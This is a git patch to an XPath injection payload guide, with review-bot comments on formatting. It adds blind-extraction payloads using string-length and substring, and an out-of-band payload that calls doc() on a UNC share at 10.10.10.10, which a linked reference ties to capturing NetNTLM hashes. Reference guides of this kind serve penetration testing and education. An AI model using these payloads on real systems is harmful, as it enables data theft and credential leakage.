From 88f020381ddcefc96a3fb9125fa398b6f74ba76a Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 22 Oct 2019 23:06:35 +0200 Subject: [PATCH] Out of band XPATH --- XPATH Injection/README.md | 27 +++++++++++++++++++++------ 1 file changed, 21 insertions(+), 6 deletions(-) diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md index 4b2eddc..12bb05e 100644 --- a/XPATH Injection/README.md +++ b/XPATH Injection/README.md @@ -1,6 +1,13 @@ # XPATH injection -XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. +> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. + +## Summary + +* [Exploitation](#exploitation) +* [Blind exploitation](#blind-exploitation) +* [Out Of Band Exploitation](#out-of-band-exploitation) +* [References](#references) ## Exploitation 
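Review bot: the new Summary list in this hunk capitalises its entries inconsistently with each other and with the headings they link to ("Blind exploitation" vs the heading "## Blind Exploitation", and "Out Of Band Exploitation" with every word capitalised); the GitHub anchors still resolve, but the list would read cleaner with one convention, e.g. `* [Blind Exploitation](#blind-exploitation)` and `* [Out of Band Exploitation](#out-of-band-exploitation)`, with the new heading in the second hunk renamed to match.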
@@ -24,16 +31,24 @@ x' or name()='username' or 'x'='y ## Blind Exploitation -```sql 1. Size of a string -and string-length(account)=SIZE_INT - + ```sql + and string-length(account)=SIZE_INT + ``` 2. Extract a character -substring(//user[userid=5]/username,2,1)=CHAR_HERE -substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) + ```sql + substring(//user[userid=5]/username,2,1)=CHAR_HERE + substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) + ``` + +## Out Of Band Exploitation + +```powershell +http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE') ``` ## References * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) * [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/) +* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
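Review bot: the "Out Of Band Exploitation" section added here gives a bare payload with no explanation and tags it with the wrong fence language. The line `http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')` is a URL carrying an XPath expression, not PowerShell, so ` ```powershell ` should be a plain fence or ` ```http `. More importantly, readers would benefit from one sentence stating what the technique relies on: `doc()` is an XPath 2.0 / XQuery function, so the payload only does anything when the backend uses a processor that supports it and allows external document access, and the `//10.10.10.10/SHARE` argument is a UNC path whose resolution by a Windows host is what the newly added NetNTLM reference describes. Stating that prerequisite also tells defenders what to check (processor version and whether external document resolution can be disabled). Minor: the XPath fragments under "Blind Exploitation" are tagged ` ```sql `; the tag is only for highlighting, but a comment or plain fence would avoid suggesting these are SQL.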